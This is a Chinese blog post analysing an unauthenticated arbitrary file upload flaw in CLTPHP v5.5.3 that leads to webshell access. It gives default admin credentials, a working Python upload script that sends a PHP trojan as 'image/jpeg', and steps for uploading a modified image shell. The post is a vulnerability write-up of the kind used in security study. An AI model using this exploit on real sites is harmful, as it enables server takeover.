php getshell,CLTPHP_v5.5.3 前台Getshelll漏洞

最新推荐文章于 2021-09-16 09:04:25 发布
最新推荐文章于 2021-09-16 09:04:25 发布
阅读量2.3k 收藏
点赞数
文章标签: php getshell

默认后台地址: http://127.0.0.1/admin/login/index.html

默认账号密码: 后台登录名:admin 密码:admin123

代码分析

1、漏洞文件位置:/app/user/controller/UpFiles.php 第5-25行:

d43a5ae6b4eef2885b126e64db35e973.png

在这段函数中,未经用户权限验证,获取表单内容,存在越权绕过上传的情况。我们继续跟进move函数:

2、文件位置:/think/library/think/File.php 第329-377行:

513ff4ced66911018443995d0fe71054.png

在这段函数中,经过一系列检测后上传文件,我们重点来看一下check验证上传函数。

3、文件位置:/think/library/think/File.php 第218-245行:

5acf7b9e8e69914860d34975736157f5.png

在check函数中检查文件大小、Mime类型、文件后缀等,主要是从数组中获取,函数未带入参数rule,故采用默认值,我们看一下rule的值

ee19eea26823f54a2011830c52daa7f6.png

在同文件中$rule默认值为date,调用ThinkPHP的上传函数,但配置不当导致过滤函数chenk无效,导致程序在实现存在任意文件上传漏洞,攻击者无需任何权限,可直接上传恶意脚本,控制网站服务器权限。

漏洞利用

利用方式一:

1、 通过编写Python脚本,模拟Ajax 异步请求, Python’脚本如下:

#!/usr/bin/python #-*- coding: UTF-8 -*- import requests header = { 'User-Agent' : 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)' , 'X-Requested-With': 'XMLHttpRequest',} url = "http://127.0.0.1/user/upFiles/upload" files ={'file':('1.php',open('1.php','rb'),'image/jpeg')} res = requests.post(url, files=files,headers=header) print res.text

2、在同一目录下放置脚本和1.php文件名的小马,运行Python脚本,成功上传木马并返回路径。

15636fbe05b8c4caf54c9a3355e1ee5a.png

访问url,成功getshell

ed040383d79ec2fd1ce8531066715d64.png

利用方式二:

1、在前台注册一个用户test,登录会员中心

28779c9e1f18e71e0496d930549415eb.png

2、在会员中心—设置—上传图片马(包含一句话)—抓包改包为php后缀名

efd3757b125e119e3fe8c80a504d785d.png

247165a88d846e4f3425c1047d2f1900.png

3、访问shell地址,成功获取网站权限

http://127.0.0.1/public/uploads/20180309/64a211154e71c05795a9f901860b62b9.php

70903c2593751e4abf4f1e322aac98b1.png

困困困睡吧接不到
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【实战篇】第14篇:CLTPHP_v5.5.3 前台任意文件上传漏洞1
08-03
1、漏洞文件位置:/app/user/controller/UpFiles.php 第5-25行: 2、文件位置:/think/library/think/Fi
CLTPHP_v5.5.3 前台任意文件上传漏洞.pdf
最新发布
04-22
价值5999,vip免费阅读,可用于实战拟态,渗透测试学习,资源复现,红蓝对抗,攻防打点,漏洞复现,技术考证、权限维持,应急响应,Hvv实战
【代码审计】CLTPHP_v5.5.3前台XML外部实体注入漏洞分析
12-02 749
0x01 环境准备 CLTPHP官网:http://www.cltphp.com 网站源码版本:CLTPHP内容管理系统5.5.3版本 程序源码下载:https://gitee.com/chichu/cltphp 默认后台地址: http://127.0.0.1/admin/login/index.html 默认账号密码: 后台登录名:admin  密码:admin123 测...
CLTPHP 漏洞
a674212706的博客
07-25 574
前言 awd小组的第一次训练 0x01 首先看一下主界面 使用的应该是PHP模板,随便翻一下找到一个注册界面 随便注册一个用户,登陆后在设置里找到一个上传点 上传我们的一句话木马 查看返回包,上传成功 访问失败,猜测返回路径可能不是绝对路径 通过报错信息查找关键词,发现存在public目录 那再把public加上再试试~ success! 菜刀连接 0x02 换个思路,网...
php _get漏洞,thinkphp代码执行getshell漏洞解决
weixin_42301367的博客
03-18 2457
先来简单说说前天thinkphp官方修复的一个getshell漏洞,框架对控制器没有进行足够的检测导致的一处getshell影响的范围:5.x < 5.1.31, <= 5.0.23漏洞危害: 导致系统被提权(你懂的)先来讲下,5.0 跟5.1的区别吧,tp5.1中引入了容器(Container)和门面(Facade)这两个新的类 tp5.0是没有这两个新的类的,漏洞原理URL:ht...
PHP7CMS 无条件前台GETSHELL
xiaoi123的博客
12-20 487
PHP7CMS 无条件前台GETSHELL Version:2018-10-09 //最新版中以修复此漏洞 这个漏洞很简单,如果作者在写代码的时候考虑到一点点安全方面,其实都可以避免的。 01 02 03 04 05 06 07 08 09 10 11 12 // php7...
CLTPHP 5.5.3 任意文件上传漏洞
weixin_50464560的博客
09-16 1016
一、漏洞简介 CLTPHP采用ThinkPHP开发,后台采用Layui框架的内容管理系统。 二、漏洞影响 CLTPHP 5.5.3 三、复现过程 找到一个注册界面 随便注册一个用户,登陆后在设置里找到一个上传点 上传我们的一句话木马 查看返回包,上传成功 访问失败,猜测返回路径可能不是绝对路径 通过报错信息查找关键词,发现存在public目录 那再把public加上再试试~ success! 菜刀连接 PoC payload.py #!/usr/bin/python #-*- coding:
【代码审计】CLTPHP_v5.5.3后台任意文件下载漏洞分析
12-02 929
  0x00 环境准备 CLTPHP官网:http://www.cltphp.com 网站源码版本:CLTPHP内容管理系统5.5.3版本 程序源码下载:https://gitee.com/chichu/cltphp 默认后台地址: http://127.0.0.1/admin/login/index.html 默认账号密码: 后台登录名:admin  密码:admin123...
php 目录遍历漏洞,【代码审计】CLTPHP_v5.5.3后台目录遍历漏洞分析
weixin_30910583的博客
03-10 198
2、publicfunctionimages(){3、$path=$this->publicpath.'images/'.input('folder').'/';4、$uppath=explode('/',input('folder'));5、$leve=count($uppath)-1;6、unset($uppath[$leve]);7、...
【代码审计】CLTPHP_v5.5.3 前台任意文件上传漏洞
10-28 1330
0x00 环境准备 CLTPHP官网:http://www.cltphp.com 网站源码版本:CLTPHP内容管理系统5.5.3版本 程序源码下载:https://gitee.com/chichu/cltphp 默认后台地址: http://127.0.0.1/admin/login/index.html 默认账号密码: 后台登录名:admin 密码:admin123 测试网站首页:...
VirtualTreeViewV5.5.3_Delphi6_delphi7_virtualtreeview_V5.5.3最新_源
10-01
Virtual Treeview是一个“纯VCL”控件,这意味着它不是基于任何系统控件,而是重新编写的。正如它的名字已经表明,这个控件与其他这类控件相比,使用了一个不同的树管理模式。它不知道它所管理的数据是什么东西...
CLTPHP 后台管理系统 v5.5.3
11-25
CLTPHP后台管理系统,包含权限管理,网站基本设置,模型管理,网站内容管理,会员管理,广告管理,留言管理,友情链接等相关模块。基于ThinkPHP5开发,后台采用Bootstrap框架,实现完
HP_Socket5.5.3.ec
09-03
HPSocket For E 5.5.3 模块描述: * Copyright JessMA Open Source (ldcsaa@gmail.com) * * Version : 5.5.3 * Author : Bruce Liang * Website : http://www.jessma.org * Project : https://github.com/ldcsaa * ...
wei php getshell,海洋cms最新版前台getshell(附靶机)
weixin_30587041的博客
04-06 490
cms版本:6.45官网好像是6.48版本了直接上代码[mw_shl_code=applescript,true]function parseIf($content){if (strpos($content,'{if:')=== false){return $content;}else{$labelRule = buildregx("{if.*?)}(.*?){end if}","is");$la...
cms前台getshell分析
IT-Andy
12-18 1257
前言 毫无套路的在cnvd上看见了一个漏洞,毫无套路的想着分析一下 一脸懵逼的Getshell 官网地址:http://www.earcms.net/ 先到官网把源码下载下来搭建一下,结果发现源码是混淆过的 这种混淆方式很常见,解密也不难,因为已经知道是前台文件上传导致的getshell,所以暂时不需要全部解密出来一点点分析,暂时只关注他的上传点。 毫无套路的搭建完成后我们看到...
[代码审计]某开源商城前台getshell
weixin_30826095的博客
02-05 253
0x00 前言 这套系统搞了有点久了,漏洞是发现了,但一直卡在某个地方迟迟没拿下来。 下面就分享一下自己审这套系统的整个过程。 0x01 系统简介 略 0x02 审计入口 看到inc\function\global.php 文件 这套系统用了360的防护代码 对get,post,cookie都进行了过滤,但有一点挺有趣的。 在p=ad...
php strlen漏洞,CmsEasy前台无限制GetShell
weixin_42196750的博客
03-27 2859
来源:阿里先知(安全情报)简要描述CMSEasy官方在2016-10-12发布了一个补丁,描述只有两句话前台getshell漏洞修正;命令执行漏洞修正;我们就根据补丁来分析一下这个前台Getshell漏洞漏洞详情修改的文件不多,通过diff发现补丁中lib/default/tool_act.php 392行的cut_image_action()函数被注释了。来看看这个函数/*function c...
【代码审计】CLTPHP_v5.5.3后台目录遍历漏洞分析
12-02 686
  0x00 环境准备 CLTPHP官网:http://www.cltphp.com 网站源码版本:CLTPHP内容管理系统5.5.3版本 程序源码下载:https://gitee.com/chichu/cltphp 默认后台地址: http://127.0.0.1/admin/login/index.html 默认账号密码: 后台登录名:admin  密码:admin123...
x-cube-mcsdk-ful_5.5.3
03-16
x-cube-mcsdk-ful_5.5.3是一个软件开发工具包,用于开发物联网设备的应用程序。它提供了一系列的API和示例代码,帮助开发者快速构建物联网设备的应用程序。该工具包支持多种硬件平台和操作系统,包括STM32微控制器和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值